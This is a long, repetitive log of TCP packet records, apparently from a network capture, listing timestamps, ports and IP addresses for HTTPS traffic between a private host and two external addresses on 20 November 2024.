                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.591736078 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.591761112 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.591809034 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.591898918 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.600975037 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.602195978 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.602251053 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.608885050 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.608942986 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.608961105 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.611702919 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.611759901 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.616256952 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.616337061 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.616874933 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.616934061 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.616950989 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.624902964 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.624968052 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.624984980 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.625529051 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.625626087 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.629118919 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.629173994 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.640885115 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.640922070 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.641011000 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.641012907 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.641024113 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.641041994 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.641087055 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.646800995 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.647353888 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.647429943 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.650672913 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.650933981 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.650955915 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.651297092 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.652580023 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.652651072 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.652734041 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.653737068 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.653810978 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.653826952 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.660981894 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.661031008 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.661046028 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.668263912 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.668327093 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.668346882 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.695327997 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.698838949 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.713937044 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.713958025 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.731666088 CET49797443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.731708050 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.731786966 CET49797443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.732831955 CET49797443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.732844114 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.736351013 CET49798443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.736396074 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.736469030 CET49798443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.737384081 CET49799443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.737401962 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.737466097 CET49799443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.738320112 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.738363028 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.738599062 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.738742113 CET49801443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.738751888 CET44349801104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.738816023 CET49801443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.739428043 CET49802443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.739439011 CET44349802104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.739634037 CET49802443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.740030050 CET49798443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.740044117 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.744118929 CET49799443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.744146109 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.744955063 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.744986057 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.745348930 CET49801443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.745378971 CET44349801104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.745737076 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.745830059 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.746787071 CET49802443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.746803045 CET44349802104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.752578974 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.752666950 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.756406069 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.756463051 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.762947083 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.762985945 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.763029099 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.765799999 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.766635895 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.766711950 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.768261909 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.768311977 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.768327951 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.772737026 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.772804022 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.776523113 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.776531935 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.776571035 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.776588917 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.777339935 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.777395964 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.783525944 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.783596992 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.789452076 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.789530039 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.789556980 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.789669991 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.790235996 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.790307045 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.792566061 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.795285940 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.795344114 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.796519995 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.796572924 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.796590090 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.796750069 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.800568104 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.800621986 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.804387093 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.804394007 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.804434061 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.806719065 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.806771994 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.809621096 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.809678078 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.812760115 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.812767029 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.812808037 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.815664053 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.815716982 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.819238901 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.819283962 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.820962906 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.820971966 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.821007013 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.824940920 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.824990034 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.825098038 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.825144053 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.831583977 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.831671953 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.833518982 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.833600998 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.837250948 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.837291956 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.837332010 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.840436935 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.840492010 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.841715097 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.841768026 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.843411922 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.843460083 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.854094028 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.854172945 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.989548922 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.989592075 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.989891052 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.990582943 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.990601063 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.998893976 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.998991966 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999062061 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999083996 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999105930 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999141932 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999249935 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999258995 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999258995 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999269009 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999289989 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999303102 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999350071 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999355078 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999361992 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999414921 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999424934 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999459982 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999490976 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999509096 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999516010 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999521017 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999533892 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999578953 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999584913 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999584913 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999620914 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999628067 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999629974 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999641895 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999643087 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999671936 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999686003 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999695063 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999697924 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999703884 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999720097 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999735117 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999748945 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999790907 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999897003 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999911070 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999917030 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999927044 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999942064 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999952078 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999960899 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999979973 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.999980927 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.000030041 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.000889063 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.000900984 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.013031960 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.013092041 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.015739918 CET49805443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.015780926 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.015835047 CET49805443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.016083956 CET49805443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.016096115 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.016976118 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.016997099 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.017051935 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.017519951 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.017532110 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.019984961 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.020019054 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.020373106 CET49808443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.020400047 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.020401001 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.020443916 CET49808443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.020880938 CET49808443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.020893097 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.021109104 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.021132946 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.039268017 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.039395094 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.040397882 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.049968004 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.049968004 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.049995899 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.050096989 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.050199986 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.050218105 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.050432920 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.077389002 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.080091000 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.080370903 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.080599070 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.083939075 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.083967924 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.084242105 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.084270000 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.084765911 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.085370064 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.087362051 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.088463068 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.094997883 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.095022917 CET44349789104.16.102.112192.168.2.12
